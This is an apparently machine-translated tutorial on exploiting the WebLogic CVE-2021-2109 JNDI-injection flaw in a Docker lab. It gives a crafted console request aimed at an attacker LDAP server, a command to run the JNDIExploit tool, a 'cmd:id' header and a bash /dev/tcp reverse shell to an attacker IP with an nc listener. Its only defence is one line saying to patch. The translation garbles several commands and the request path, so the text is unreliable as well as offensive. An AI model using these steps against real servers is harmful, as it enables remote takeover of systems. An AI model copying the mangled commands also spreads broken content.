Shulou(Shulou.com)05/31 Report--

How to take advantage of Weblogic Server remote code execution CVE-2021-2109 vulnerability rebound, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

I. description of vulnerabilities

On January 20, 2021, Oracle officially released a patch that fixes several high-risk and serious vulnerabilities, including the CVE-2021-2109 Weblogic Server remote code execution vulnerability. In CVE-2021-2109, an attacker can construct a malicious request, cause JNDI injection, execute arbitrary code, and thus control the server.

Affect the version

WebLogic 3.6.0.0

WebLogic 1.3.0.0

WebLogic 2.1.3.0

WebLogic 2.1.4.0

WebLogic 1.1.0.0

Environment building

Attack aircraft (kali): 192.168.159.131 Target aircraft: 192.168.159.139

Docker is used here to build the environment

Docker pull ismaleiva90/weblogic12

Docker run-d-p 49163 7001-p 49164pur7002-p 49165pur5556 ismaleiva90/weblogic12:latest

You can see the page by visiting http://your-ip:49163/console.

Loophole recurrence

Use burpsuit to intercept access http://your-ip:49163/console messages and send them to repeater module

1. Modify the GET / console/console.portal?_nfpb=true HTTP/1.1 to POST / console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22ldapVERA) HTTP/1.1 192.168.159Tring 131Basic console/console.portal?_nfpb=true HTTP/1.1 to WeblogicEchoistAdminServer% 22)

Please note that the third digit of the address 192.168.159 is followed by a semicolon. 192.168.159 is the attack machine IP that starts the LDAP service.

2. Add "cmd:id" above the cookie to get the id information of the target server, as shown below

3. Start LDAP on the attack plane

Download address:

Https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

Java-jar JNDIExploit-v1.11.jar-I 192.168.159.131

4. Replay the modified message and successfully obtain the id information on the target.

5. Rebound shell

Base64 encode bash-I > & / dev/tcp/192.168.159.131/2333 0 > & 1 on the http://www.jackson-t.ca/runtime-exec-payloads.html website

Copy the encoded bounce shell command to the cmd below for playback, and open the nc-lvvp 2333 command to listen on port 2333 on the attack machine, and click send.

Successfully bounced back to shell

Repair suggestion

Upgrade the official security patch

After reading the above, have you mastered how to use Weblogic Server remote code to perform a CVE-2021-2109 vulnerability rebound? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.